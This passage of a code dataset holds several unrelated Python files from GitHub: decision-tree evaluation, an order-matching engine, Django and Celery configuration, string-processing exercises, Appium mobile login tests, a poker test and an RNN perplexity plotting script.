\nReturns 7 binary values:\nA = 1 on a hit, Vp = true positive, Vn = true negative,\nFp = false positive, Fn = false negative, P = positive instance, N = negative instance\n\"\"\"\ndef EvaluarInstancia (instancia, targetAtribute, Arbol, ValsAtributos, Atributos):\n    if (EsHoja(Arbol)):\n        A, Vp, Vn, Fp, Fn, P,N = 0,0,0,0,0,0,0\n        if instancia[targetAtribute] == Arbol.valor:\n            A = 1\n            #positive example classified correctly\n            if instancia[targetAtribute] == 1: Vp, P = 1,1\n            #negative example classified correctly\n            else: Vn,N = 1,1\n        else: \n            #negative example classified incorrectly\n            if instancia[targetAtribute] == 0: Fp,N = 1,1\n            #positive example classified incorrectly\n            else: Fn, P = 1,1 \n        return (A, Vp, Vn, Fp, Fn, P, N)\n    else:\n        AtributoNodo= Arbol.valor\n        valorInstancia = instancia[AtributoNodo]\n        indice = Atributos.index(AtributoNodo) #get the index of AtributoNodo in Atributos\n        PosiblesvaloresAtributoNodo = ValsAtributos[indice] #get the value range of AtributoNodo\n        indexValorInstancia = list(PosiblesvaloresAtributoNodo).index(valorInstancia) #get the index of valorInstancia among the attribute's possible values\n        return EvaluarInstancia(instancia, targetAtribute, Arbol.Ramas[indexValorInstancia], ValsAtributos, Atributos)\n\n    \n'Method that evaluates a dataset on the decision tree and prints metrics'\ndef Evaluar(Datos, targetAtribute, Arbol, ValsAtributos, Atributos):\n    A, Vp, Vn, Fp, Fn, CantP, CantN = 0,0,0,0,0,0,0\n    for i in range(Datos.shape[0]):\n        Fila = Datos.iloc[i]\n        Ai, Vpi, Vni, Fpi, Fni, P, N = EvaluarInstancia (Fila, targetAtribute, Arbol, ValsAtributos, Atributos)\n        A += Ai\n        Vp += Vpi\n        Vn += Vni\n        Fp += Fpi\n        Fn += Fni\n        CantP += P\n        CantN += N\n    \n    print (\"Accuracy: \" + str(A/Datos.shape[0]))\n    \n    if (CantP>0): \n        print(\"positive examples: \" + str(CantP))\n        print(\"correctly classified positive examples: \" + str(Vp))\n        if ((Vp + Fp)==0):\n            print(\"No example was classified as positive, so Precision cannot be computed\")\n            PresicionPositivos =0\n        else:\n            PresicionPositivos = Vp/(Vp + Fp)\n            print(\"Precision 1: \" + str(PresicionPositivos))\n        RecallPositivos = Vp/(Vp + Fn)\n        print(\"Recall 1: \" + str(RecallPositivos))\n        if (PresicionPositivos>0) and (RecallPositivos>0):\n            print(\"F1 1: \" + str(2*PresicionPositivos*RecallPositivos/(PresicionPositivos+RecallPositivos)))\n        else:\n            print(\"No positive example was classified correctly, so F1 cannot be computed\")\n    else:\n        print(\"There are no positive examples in the test set\")\n    \n    if (CantN>0): \n        print(\"negative examples: \" + str(CantN))\n        print(\"correctly classified negative examples: \" + str(Vn))\n        if ((Vn + Fn)==0):\n            print(\"No example was classified as negative, so Precision cannot be computed\")\n            PresicionNegativos =0\n        else:\n            PresicionNegativos = Vn/(Vn + Fn)\n            print(\"Precision 0: \" + str(PresicionNegativos))\n        RecallNegativos = Vn/(Vn + Fp)\n        print(\"Recall 0: \" + str(RecallNegativos))\n        if (PresicionNegativos>0) and (RecallNegativos>0):\n            print(\"F1 0: \" + str(2*PresicionNegativos*RecallNegativos/(PresicionNegativos+RecallNegativos)))\n        else:\n            print(\"No negative example was classified correctly, so F1 cannot be computed\")\n    else:\n        print(\"There are no negative examples in the test set\")\n\n\n'Method to create a decision tree and evaluate its performance'\ndef CreacionYEvaluacionID3(dataset, train, validation, CantidadEjemplos, CantAtributos):\n    #Generate a dataset with CantidadEjemplos examples, sampled uniformly from 
train\n    DatasetArbol = utils.resample(train, n_samples= CantidadEjemplos)\n    \n    #get all the column headers and drop the output columns from the list, keeping only the input ones    \n    Atributos = dataset.columns.values.tolist()\n    Atributos.remove('c1024')\n    Atributos.remove('output')\n    \n    #compute the possible values of every attribute\n    ValsAtributo = ValsAtributos(dataset, Atributos)\n    \n    # auxiliary copies are used because these structures are modified while the tree is built\n    AtributosAux = Atributos.copy() \n    ValsAtributosAux = ValsAtributos(dataset, AtributosAux)\n    \n    #build the tree\n    ArbolDecision = ID3(DatasetArbol,'output', AtributosAux, ValsAtributosAux, CantAtributos)\n    \n    #evaluation\n    Evaluar(validation,'output', ArbolDecision, ValsAtributo, Atributos)\n\n","repo_name":"luciabouza/Machine-Learning-Methods","sub_path":"lab2 - Classification trees and Random Forest/ID3.py","file_name":"ID3.py","file_ext":"py","file_size_in_byte":9615,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"30193278541","text":"from time import sleep\nfrom math import cos, sin, tan\n\n\nprint('')\nprint('Sine, cosine, tangent')\nprint('')\nsleep(0.35)\n\n# angle variable (math.sin/cos/tan expect radians)\nangulo = float(input('Enter the angle you want: '))\n\nprint (f'''\n\nSine: {sin(angulo):.2f}\n\nCosine: {cos(angulo):.2f}\n\nTangent: {tan(angulo):.2f} ''')","repo_name":"Future-Aperture/Python","sub_path":"exercícios_python/exercicios_theo/Exercicios 16-30/ex018.py","file_name":"ex018.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"}
+{"seq_id":"37623115115","text":"import sys\nfrom trading_queue import queue\nfrom db.models import orders, users, stocks\nfrom db import Session\n\nqueue = queue.QueueClient()\n\n\ndef get_matching_order(session, order, exclude=set()):\n    order_query = (\n        session.query(orders.Orders)\n        .\n        # match the stock name\n        filter(orders.Orders.stock_identifier == order.stock_identifier)\n        .\n        # only incomplete orders\n        filter(orders.Orders.remaining_quantity > 0)\n        .\n        # don't allow a user to match their own order\n        filter(orders.Orders.user_id != order.user_id)\n        .\n        # exclude orders we've already seen\n        filter(orders.Orders.id.notin_(exclude))\n    )\n    if order.is_sell_order:\n        order_query = (\n            order_query.\n            # search for a buy order\n            filter(orders.Orders.is_sell_order == False)\n            .\n            # only consider buyers with prices higher than your sell price\n            filter(orders.Orders.price_cents >= order.price_cents)\n            .\n            # if I'm selling, I want the highest buy price possible. After that, older orders first\n            order_by(orders.Orders.price_cents.desc(), orders.Orders.created_ts.asc())\n        )\n    else:\n        order_query = (\n            order_query.\n            # search for a sell order\n            filter(orders.Orders.is_sell_order == True)\n            .\n            # only consider sellers with selling prices less than what you want\n            # to buy it for\n            filter(orders.Orders.price_cents <= order.price_cents)\n            .\n            # If I'm buying, I don't care which order I match with, my price is fixed. 
Take the oldest\n            order_by(orders.Orders.created_ts.asc())\n        )\n    return order_query.first()\n\n\ndef update_stock_for_sale(session, seller, stock_identifier, quantity):\n    stock = (\n        session.query(stocks.Stocks)\n        .filter(stocks.Stocks.identifier == stock_identifier)\n        .filter(stocks.Stocks.user_id == seller.id)\n        .first()\n    )\n    # sellable quantity should already be correct\n    stock.quantity -= quantity\n    session.commit()\n\n\ndef update_stock_for_purchase(session, buyer, stock_identifier, quantity):\n    stock = (\n        session.query(stocks.Stocks)\n        .filter(stocks.Stocks.identifier == stock_identifier)\n        .filter(stocks.Stocks.user_id == buyer.id)\n        .first()\n    )\n    # create the stock if the user doesn't have it yet\n    if not stock:\n        stock = stocks.Stocks(stock_identifier, quantity)\n        buyer.stocks.append(stock)\n    else:\n        stock.quantity += quantity\n    stock.sellable_quantity += quantity\n    session.commit()\n\n\ndef handle_order(ch, method, properties, body):\n    order_id = int(body)\n    with Session() as session:\n        order = (\n            session.query(orders.Orders).filter(orders.Orders.id == order_id).first()\n        )\n        # bail out before touching order attributes, so a missing order can't raise\n        if not order or order.remaining_quantity == 0:\n            return\n        order_creator = (\n            session.query(users.Users).filter(users.Users.id == order.user_id).first()\n        )\n        matches = set()\n        matching_order = get_matching_order(session, order)\n        while matching_order and order.remaining_quantity > 0:\n            matching_user = (\n                session.query(users.Users)\n                .filter(users.Users.id == matching_order.user_id)\n                .first()\n            )\n            seller, buyer = order_creator, matching_user\n            if not order.is_sell_order:\n                seller, buyer = matching_user, order_creator\n            # the amount of shares that overlap\n            match_amount = min(\n                matching_order.remaining_quantity, order.remaining_quantity\n            )\n            # price of the transfer per share (will be the buy order's price)\n            price_per_share = max(matching_order.price_cents, order.price_cents)\n            # decrease each order by the amount traded\n            matching_order.remaining_quantity -= match_amount\n            order.remaining_quantity -= match_amount\n            # give the seller the cash, and let them use it\n            seller.cash += price_per_share * match_amount\n            seller.liquid_cash += price_per_share * match_amount\n            # scope down the buyer's cash (purchase price already factored into liquid cash)\n            buyer.cash -= price_per_share * match_amount\n            # move the shares\n            update_stock_for_purchase(\n                session, buyer, order.stock_identifier, match_amount\n            )\n            update_stock_for_sale(session, seller, order.stock_identifier, match_amount)\n            # just to be safe, commit what we've done so far before continuing\n            session.commit()\n\n            # fetch another order\n            matches.add(matching_order.id)\n            matching_order = get_matching_order(session, order, exclude=matches)\n\n\nqueue.create_trading_consumer(handle_order)\n","repo_name":"NiharS/trading_exchange","sub_path":"order_matcher/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"22319210069","text":"from django.urls import path\nfrom django.conf.urls import url, include \nfrom rest_framework.routers import DefaultRouter\n\nfrom . 
import views\n\n\napp_name = 'chat'\n\n\nurlpatterns = [\n    path('', views.home, name='home'),\n    path('h', views.h, name='h'),\n    path('api/v1/create/', views.create_room, name='create_room'),\n    path('register/', views.register, name='register'),\n    path('logout/', views.logout_request, name='logout'),\n    path('api/v1/search/', views.search, name='search'),\n    path('chat/', views.chat, name='chat'),\n    path('test/', views.test, name='test'),\n    path('api/v1/chats', views.get_chat, name='get_chat'),\n    #path('chats', views.get_chat, name='get_chat'),\n    path('api/v1/chats/', views.get_messages, name='get_messages'),\n]","repo_name":"TomHellCat/Chatter","sub_path":"Django Backend/chat/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"2474988785","text":"import os\n\nfrom celery import Celery\nfrom celery.schedules import crontab\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'not_clean.settings')\n\n\napp = Celery('not_clean')\napp.config_from_object('django.conf:settings', namespace='CELERY')\napp.autodiscover_tasks()\n\napp.conf.beat_schedule = {\n    'spam_task': {\n        'task': 'blog.tasks.schedule_task',\n        'schedule': crontab(minute='*/1')\n    }\n}\n","repo_name":"ArtsemDev/news_very_cool_portal","sub_path":"not_clean/not_clean/celery.py","file_name":"celery.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"7204267021","text":"'''\n1) The text file k7-3.txt contains a string of characters from the Latin alphabet A, B, C. Find\nthe length of the longest substring consisting of the character C.\n'''\n\nfile = open('k7-3.txt')\ndata = file.read()\nfile.close()\ncount = 0\nmax_count = 0\nfor char in data:\n    if char == 'C':\n        count += 1\n        continue\n    if max_count < count:\n        max_count = count\n    count = 0\nprint('1.', max_count)\n\n'-------------------------------------------------------------------------------------------------------------------'\n\n'''\n2) The text file k7a-2.txt contains a string of characters from the Latin alphabet A, B, C, D, E, F.\nFind the length of the longest substring consisting of the characters A, C, D (in any order).\n'''\n\nfile = open('k7a-2.txt')\ndata = file.read()\nfile.close()\ncount = 0\nmax_count = 0\nfor char in data:\n    if char in 'ACD':\n        count += 1\n        continue\n    if max_count < count:\n        max_count = count\n    count = 0\nprint('2.', max_count)\n\n'-------------------------------------------------------------------------------------------------------------------'\n\n'''\n3) The text file k7b-2.txt contains a string of characters from the Latin alphabet A, B, C, D, E, F.\nFind the maximum length of a string of the form DBACDBACDBAC.... 
(made up of DBAC fragments;\nthe last fragment may be incomplete).\n'''\n\nfile = open('k7b-2.txt')\ndata = file.read()\nfile.close()\ncount = 0\nmax_count = 0\nfor char in data:\n    if (char == 'D' and count % 4 == 0) or \\\n            (char == 'B' and count % 4 == 1) or \\\n            (char == 'A' and count % 4 == 2) or \\\n            (char == 'C' and count % 4 == 3):\n        count += 1\n        continue\n    if max_count < count:\n        max_count = count\n    count = 0\n    if char == \"D\":\n        count = 1\nprint('3.', max_count)\n\n'-------------------------------------------------------------------------------------------------------------------'\n\n'''\n4) The text file k7c-2.txt contains a string of characters from the Latin alphabet A, B, C, D, E, F.\nFind the number of substrings of length 3 that satisfy the following conditions:\n    the 1st character is one of A, C, E;\n    the 2nd character is one of A, D, F and differs from the first;\n    the 3rd character is one of A, B, F and differs from the second.\n'''\n\nfile = open('k7c-2.txt')\ndata = file.read()\nfile.close()\ncount = 0\nfor i in range(len(data) - 2):\n    if data[i] in \"ACE\" and \\\n            data[i + 1] in \"ADF\" and data[i] != data[i + 1] and \\\n            data[i + 2] in \"ABF\" and data[i + 2] != data[i + 1]:\n        count += 1\nprint('4.', count)\n\n'-------------------------------------------------------------------------------------------------------------------'\n\n'''\n5) The text file k8-25.txt contains a string of characters that may include uppercase\nLatin letters A…Z and decimal digits. Find the length of the longest substring\nconsisting of identical characters. If the file contains several suitable substrings of the same length,\ntake the first one. Print the character the substring is built from, then, separated by\na space, the length of that substring.\n'''\n\nfile = open('k8-25.txt')\ndata = file.read()\nfile.close()\ncount = 1\nmax_count = 0\nmax_char = data[0]\nlast_char = data[0]\nfor char in data:\n    if char == last_char:\n        count += 1\n        continue\n    elif max_count < count:\n        max_count = count\n        max_char = last_char\n    last_char = char\n    count = 1\nprint('5.', max_char, max_count)\n\n'-------------------------------------------------------------------------------------------------------------------'\n\n'''\n6) The text file k8-2.txt consists of at most 10^6\ncharacters. Determine the maximum number of\nconsecutive characters in which every two neighbouring characters differ.\n'''\n\nfile = open('k8-2.txt')\ndata = file.read()\nfile.close()\ncount = 0\nmax_count = 0\nfor i in range(1, len(data) - 1):\n    if data[i] != data[i + 1]:\n        count += 1\n        continue\n    elif max_count < count:\n        max_count = count\n    count = 1\nprint('6.', max_count)\n\n'-------------------------------------------------------------------------------------------------------------------'\n\n'''\n159) The text file 24-157.txt contains only uppercase Latin letters (ABC…Z). Determine the character\nthat most often occurs in the file between two identical characters. For example, the text CCBAABABCBC contains\nthe combinations ABA, BAB, BCB and CBC. Most often – twice – the character between two identical characters is B, so for this\ncase the answer is B2 (without spaces or other separators). 
If several such characters exist, print the one\nthat comes first in the alphabet.\n'''\n\nfile = open('24-157.txt')\ndata = file.read()\nfile.close()\nchars = {}\nfor i in range(65, 91):\n    chars[chr(i)] = 0\n\nfor i in range(1, len(data) - 1):\n    if data[i - 1] == data[i + 1]:\n        chars[data[i]] += 1\n\nmax_value = max(list(chars.values()))\n\nmax_char = ''\nfor char in chars:\n    if chars[char] == max_value:\n        max_char = char\n        break\n\nprint(f'159. {max_char}{max_value}')\n\n'''\nAnswers: 1. 1\n        2. 11\n        3. 95\n        4. 891\n        5. V 8\n        6. 166\n        159. W1608\n'''\n","repo_name":"Andrey-Bedretdinov/School","sub_path":"Архив/Homework/Homework 23.11.21/Homework 23.11.21.py","file_name":"Homework 23.11.21.py","file_ext":"py","file_size_in_byte":6571,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"21384776873","text":"import time\nimport warnings\n\nfrom library.core.TestCase import TestCase\nfrom library.core.common.simcardtype import CardType\nfrom library.core.utils.applicationcache import current_mobile, current_driver, switch_to_mobile\nfrom library.core.utils.testcasefilter import tags\n\nfrom pages.call.CallPage import CallPage\nfrom pages.login.LoginPage import OneKeyLoginPage\n\nfrom preconditions.BasePreconditions import LoginPreconditions\n\nREQUIRED_MOBILES = {\n    'Android-移动': 'M960BDQN229CH',\n    'IOS-移动': '',\n    'Android-电信': 'single_telecom',\n    'Android-联通': 'single_union',\n    'Android-移动-联通': 'mobile_and_union',\n    'Android-移动-电信': '',\n    'Android-移动-移动': 'double_mobile',\n    'Android-XX-XX': 'others_double',\n}\n\n\nclass Preconditions(LoginPreconditions):\n    \"\"\"\n    Decomposed preconditions\n    \"\"\"\n\n    @staticmethod\n    def select_single_cmcc_android_4g_client():\n        \"\"\"\n        Launch\n        1. 4G, Android client\n        2. China Mobile SIM card\n        :return:\n        \"\"\"\n        client = switch_to_mobile(REQUIRED_MOBILES['测试机'])\n        client.connect_mobile()\n\n    @staticmethod\n    def connect_mobile(category):\n        \"\"\"Select a mobile phone\"\"\"\n        client = switch_to_mobile(REQUIRED_MOBILES[category])\n        client.connect_mobile()\n        return client\n\n    @staticmethod\n    def select_assisted_mobile2():\n        \"\"\"Switch to the single-SIM, other-carrier Android phone and launch the app\"\"\"\n        switch_to_mobile(REQUIRED_MOBILES['辅助机2'])\n        current_mobile().connect_mobile()\n\n    # @staticmethod\n    # def login_by_one_key_login():\n    #     \"\"\"\n    #     Log in from the one-key login page\n    #     :return:\n    #     \"\"\"\n    #     # wait for the phone number to finish loading, then tap one-key login\n    #     one_key = OneKeyLoginPage()\n    #     one_key.wait_for_tell_number_load(60)\n    #     login_number = one_key.get_login_number()\n    #     one_key.click_one_key_login()\n    #     one_key.click_sure_login()\n    #     # wait for the message page\n    #     gp = GuidePage()\n    #     try:\n    #         gp.click_cancel_update()\n    #         # gp.click_the_checkbox()\n    #         # gp.click_the_no_start_experience()\n    #     except:\n    #         gp.click_text(\"暂不升级\")\n    #         pass\n    #     cp = CallPage()\n    #     cp.click_contact_tip()\n    #     return login_number\n\n    @staticmethod\n    def app_start_for_the_first_time():\n        \"\"\"First launch of the APP (simulated by resetting the app)\"\"\"\n        current_mobile().reset_app()\n\n    @staticmethod\n    def terminate_app():\n        \"\"\"\n        Force-close the app and remove it from the background\n        :return:\n        \"\"\"\n        app_id = current_driver().capabilities['appPackage']\n        current_mobile().terminate_app(app_id)\n\n    @staticmethod\n    def background_app(seconds):\n        \"\"\"Run in the background\"\"\"\n        current_mobile().background_app(seconds)\n\n    @staticmethod\n    def reset_and_relaunch_app():\n        \"\"\"First launch of the APP (simulated by resetting the app)\"\"\"\n        app_package = 'com.cmic.college'\n        current_driver().activate_app(app_package)\n        current_mobile().reset_app()\n\n\nclass LoginTest(TestCase):\n    \"\"\"Login module\"\"\"\n\n    @classmethod\n    def setUpClass(cls):\n        warnings.simplefilter('ignore', ResourceWarning)\n\n    @staticmethod\n    def 
setUp_test_login_0001():\n        Preconditions.select_mobile('Android-移动')\n        current_mobile().hide_keyboard_if_display()\n        Preconditions.app_start_for_the_first_time()\n        Preconditions.make_already_in_one_key_login_page()\n\n    @tags('ALL', 'CMCC', 'login')\n    def test_login_0001(self):\n        \"\"\"\n        Remove the greyed-out login button on first login\t\"1. Normal network\n        2. Currently on the one-key login page\n        3. First login for this user\"\t\"1. Check what the page shows\n        2. Tap the one-key login button for the local number\n        3. Tap Disagree\n        4. Repeat step 2 and tap Agree\n        5. Tap the Confirm button\"\t\"1. The text 'Logging in means you have read and agree to the Software License Service Agreement and the Privacy and Information Protection Policy' is shown at the bottom, with no checkbox, and the login button is highlighted\n        2. A 'User Agreement and Privacy Protection' dialog pops up:\n        welcome to 密友圈; we attach great importance to protecting your personal information and strictly comply with the relevant laws and regulations.\n        We update our software license agreement and privacy agreement from time to time in line with national laws and regulations; you can review the detailed terms via the Software License Service Agreement and the Privacy and Information Protection Policy, and you should read them carefully before using 密友圈.\n        Tapping the Agree button below lets you start using 密友圈, and we will do our utmost to protect your privacy.\n        The dialog offers Agree and Disagree buttons\n        3. The dialog disappears and the current page stays\n        4. A dialog pops up: 'Log in with number XXXX; after logging in, video calls, voice calls and chats inside the 密友圈 app will be initiated with this number', with a Confirm button\n        5. 密友圈 opens successfully\"\n        :return:\n        \"\"\"\n        login = OneKeyLoginPage()\n        # check the one-key login flow\n        cards = login.get_cards_c(CardType.CHINA_MOBILE)\n        login.wait_for_page_load()\n        login.wait_for_tell_number_load(timeout=10)\n        login.click_text('一键登录')\n        time.sleep(1)\n        if login.is_text_present_c('用户协议和隐私保护'):\n            login.click_locator_key_c('不同意')\n            time.sleep(0.5)\n        time.sleep(2)\n        self.assertEqual(login.is_text_present_c('使用{}一键登录'.format(cards)), True)\n        login.click_text('一键登录')\n        time.sleep(1)\n        if login.is_text_present_c('用户协议和隐私保护'):\n            login.click_locator_key_c('同意')\n        call = CallPage()\n        call.is_text_present_c('通话', default_timeout=20)\n        time.sleep(2)\n        call.click_always_allow_c()\n        time.sleep(3)\n        call.remove_mask_c(2)\n        self.assertEqual(call.is_on_this_page(), True)\n\n    @staticmethod\n    def setUp_test_login_0003():\n        Preconditions.select_mobile('Android-移动')\n        current_mobile().hide_keyboard_if_display()\n        # Preconditions.app_start_for_the_first_time()\n        Preconditions.make_already_in_one_key_login_page()\n\n    @tags('ALL', 'CMCC', 'me')\n    def test_login_0003(self):\n        \"\"\" Non-first login\t\"1. Normal network\n        2. Currently on the one-key login page\n        3. Not the user's first login\"\t\"1. Tap one-key login\n        2. Tap confirm to log in with number XX\"\tSuccessfully logs in and lands on the call page\n        \"\"\"\n        login = OneKeyLoginPage()\n        if login.is_text_present_c('一键登录'):\n            login.wait_for_tell_number_load(20)\n            login.click_text('一键登录')\n        if login.is_text_present_c('用户协议和隐私保护'):\n            login.click_locator_key_c('同意')\n        call = CallPage()\n        call.is_text_present_c('通话', default_timeout=20)\n        time.sleep(2)\n        call.click_always_allow_c()\n        time.sleep(3)\n        call.remove_mask_c(2)\n        self.assertEqual(login.is_text_present_c(\"通话\"), True)\n","repo_name":"wangquansheng/appium-Demo","sub_path":"TestCase/m001_login/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":7091,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"79126833","text":"# a = [1,2,3,4,5,6]\n# b = 0\n# for i in a:\n#     b += 1\n#     if b % 3 == 0:\n#         print('remove%d'%i)\n#         a.remove(i)\n#     print(i)\n#\n# def KK(a):\n#     if a %2==0:\n#         return True, 0\n#     else:\n#         return False, 2\n#\n# a = KK(3)\n# print(a)\n# if a[0]:\n#     print('dd')\n# b = KK(4)\n# print(b)\n# if b[0]:\n#     print('ss')\n\n# from collections import Counter\n#\n# def Most_Common(lst):\n#     data = Counter(lst)\n#     return data.most_common(1)[0]\n#\n# lst = ['A', 'A', 'A', 'A', 2]\n# print(Most_Common(lst))\n#\n# lst = [13,4,13,14,1]\n# print(sorted(lst))\n# from Game.utils import *\n# players = [Player() for i in range(5)]\n# p2 = players[2]\n# p2.bet(300)\n# print(p2.possess)\n# print(players[2].possess)\n# print(id(p2))\n# print(id(players[2]))\n#\n# p2.current_state = Player_State.ALLIN\n# print(players[2].current_state)\n\n# a = ' d a '\n# print(a.strip(' ').split(' '))\n\n# a = [1,2,3,4,5,6]\n# print(a[3:])\n\nfrom Game.utils import *\npublic_cards = 
[Card('10', 'hearts'), Card('J', 'spades'), Card('Q', 'clubs'), Card('K', 'clubs'), Card('A', 'spades')]\n\nh1 = [Card('K', 'hearts'), Card('Q', 'diamonds')]\nh2 = [Card('J', 'clubs'), Card('2', 'diamonds')]\nh3 = [Card('4', 'diamonds'), Card('Q', 'spades')]\n\n# test hand comparison\nfrom evaluate_card import *\nhb1 = choose_own_biggest_card(h1+public_cards)\nhb2 = choose_own_biggest_card(h2+public_cards)\nhb3 = choose_own_biggest_card(h3+public_cards)\n\nprint(hb1)\nprint(hb2)\nprint(hb3)\n\n# test chip allocation when several players are all-in\nfrom Game.main import GameManager\npublic_cards = [Card('6', 'hearts'), Card('J', 'spades'), Card('Q', 'clubs'), Card('K', 'clubs'), Card('A', 'spades')]\nh1 = [Card('K', 'hearts'), Card('Q', 'diamonds')]\nh2 = [Card('J', 'clubs'), Card('10', 'diamonds')]\nh3 = [Card('10', 'diamonds'), Card('Q', 'spades')]\n\ngm = GameManager(4)\ngm.alive_player_id = alive_player_id = [0,1,2,3]\ngm.alive_player_num = 4\ngm.init_env(0, 3)\ngm.env.public_cards = public_cards\n\ngm.players[0].possess = 100\ngm.players[0].current_bet = 500\ngm.players[0].current_state = Player_State.FOLD\n\ngm.players[1].card = h1\ngm.players[1].possess = 0\ngm.players[1].current_bet = 3000\ngm.players[1].current_state = Player_State.ALLIN\n\ngm.players[2].card = h2\ngm.players[2].possess = 0\ngm.players[2].current_bet = 2000\ngm.players[2].current_state = Player_State.ALLIN\n\ngm.players[3].card = h3\ngm.players[3].possess = 0\ngm.players[3].current_bet = 2200\ngm.players[3].current_state = Player_State.ALLIN\n\ngm.print_info()\ngm.compare_card()\ngm.print_info()\n\n","repo_name":"sjyjytu/Holdem","sub_path":"Game/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"}
+{"seq_id":"3722322953","text":"from rest_framework import status\nfrom rest_framework.decorators import APIView\nfrom rest_framework.response import Response\nfrom .PendingJobsHandler import PendingJobsHandler\nfrom .models import Job\nfrom .serializers import CreateJobSerializer, ListJobSerializer\nfrom rest_framework.authentication import get_authorization_header\n\n\nclass Jobs(APIView):\n    jobsHandler = PendingJobsHandler()\n\n    def get(self, request, status_value=None):\n        if status_value is None:\n            job_data = Job.objects.all()\n            serialized_data = ListJobSerializer(job_data, many=True)\n            return Response(serialized_data.data, status=status.HTTP_200_OK)\n        else:\n            job_data = Job.objects.filter(status=status_value)\n            serialized_data = ListJobSerializer(job_data, many=True)\n            return Response(serialized_data.data, status=status.HTTP_200_OK)\n\n    def post(self, request, status_value=None):\n        if status_value is not None:\n            return Response(status=status.HTTP_400_BAD_REQUEST)\n\n        header_info = get_authorization_header(request).decode(\"utf-8\")\n\n        if header_info == \"allow\":\n            new_job = CreateJobSerializer(data=request.data)\n            if new_job.is_valid():\n                new_job.save()\n\n                if self.jobsHandler.isRunning is False:\n                    self.jobsHandler.process_pending_jobs()\n\n                created_object = Job.objects.get(pk=new_job.data[\"id\"])\n                serialized_object = ListJobSerializer(created_object)\n                return Response(serialized_object.data, status=status.HTTP_201_CREATED)\n        return Response(\n            {\"error\": \"Unauthorized to access this resource\", \"status\": status.HTTP_401_UNAUTHORIZED},\n            status=status.HTTP_401_UNAUTHORIZED\n            
)\n","repo_name":"felipe0328/csc_rest_api_python","sub_path":"rest_api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33591789568","text":"import sys\nsys.path.insert(0, 'C:/Users/Natalia/Desktop/BA/Py Scripts')\n\nfrom utils import *\nimport matplotlib.pyplot as plt\n\ndef plot_RNN_ppl(base_ppl):\n fig = plt.figure(figsize=(25, 15))\n\n plt.subplot(2,2,1)\n n, ppl_test, ppl_train = read_ppl(\"data/ppl.test.all.size17.diff.hidd.txt\", \"data/ppl.train.all.size17.diff.hidd.txt\", 0, 1)\n plt.plot(n, ppl_train, '-D', markevery=[8], label=\"RNN estimated PPL of train data\")\n plt.plot(n, ppl_test, '-D', label=\"RNN estimated PPL of test data\", markevery=[8])\n plt.plot(n, [base_ppl for x in n], label=\"True PPL\")\n #plt.annotate(\"Min train PPL: \"+str(min(ppl_train))+\"\\nMin test PPL: \"+str(min(ppl_test)),xy=(8,2.129925),xytext=(8, 6.4), rotation=45)\n plt.title(\"Estimating PPL with RNNLM: sentences contain round brackets, \\nmax number of open brackets is 4, text size=2^17\")\n plt.legend()\n plt.xlabel(\"Hidden layer size (powers of 2)\")\n plt.ylabel(\"PPL net\")\n\n plt.subplot(2,2,2)\n n, ppl_test, ppl_train = read_ppl(\"data/ppl.test.all.size17.hidd64.diff.bptt.txt\", \"data/ppl.train.all.size17.hidd64.diff.bptt.txt\", 0, 1)\n plt.plot(n, ppl_train, '-D', markevery=[72], label=\"RNN estimated PPL of train data\")\n plt.plot(n, ppl_test, '-D', label=\"RNN estimated PPL of test data\", markevery=[72])\n plt.plot(n, [base_ppl for x in n], label=\"True PPL\")\n #plt.annotate(\"Min train PPL: \"+str(min(ppl_train))+\"\\nMin test PPL: \"+str(min(ppl_test)),xy=(72,2.129925),xytext=(72, 1.142), rotation=45)\n plt.title(\"Estimating PPL with RNNLM: sentences contain round brackets, \\nmax number of open brackets is 4, text size=2^17, hidden layer size=64\")\n plt.legend()\n plt.xlabel(\"BPTT step\")\n plt.ylabel(\"PPL net\")\n \n plt.subplot(2,2,3)\n n, ppl_test, ppl_train = read_ppl(\"data/ppl.test.all.size17.hidd64.bptt72.diff.cls.txt\", \"data/ppl.train.all.size17.hidd64.bptt72.diff.cls.txt\", 1, 1)\n plt.plot(n, ppl_train, '-D', markevery=[72], label=\"RNN estimated PPL of train data\")\n plt.plot(n, ppl_test, '-D', label=\"RNN estimated PPL of test data\", markevery=[72])\n plt.plot(n, [base_ppl for x in n], label=\"True PPL\")\n #plt.annotate(\"Min train PPL: \"+str(min(ppl_train))+\"\\nMin test PPL: \"+str(min(ppl_test)),xy=(72,1.129925),xytext=(72, 1.1425), rotation=45)\n #plt.annotate(\"Min test PPL: \"+str(min(ppl_test)),xy=(100,1.129591),xytext=(100, 1.142), rotation=45)\n plt.title(\"Estimating PPL with RNNLM: sentences contain round brackets, \\nmax number of open brackets is 4, text size=2^17, hidden layer size=64, bptt=72\")\n plt.legend()\n plt.xlabel(\"Number of classes\")\n plt.ylabel(\"PPL net\")\n\n fig.savefig('RNN_round_max_open_4_ppl.png', bbox_inches='tight')\n\n\ndef read_prob(file):\n '''\n Read probabilities of separate brackets based on RNN model.\n '''\n round_open = []\n round_closed = []\n end_of_sent = []\n with open(file, 'r') as f:\n for line in f:\n l = line.split()\n bracket = l[2].strip()\n if bracket==\"(\":\n round_open.append(float(l[1].strip()))\n elif bracket==\")\":\n round_closed.append(float(l[1].strip()))\n else:\n end_of_sent.append(float(l[1].strip()))\n return round_open, round_closed, end_of_sent\n\ndef 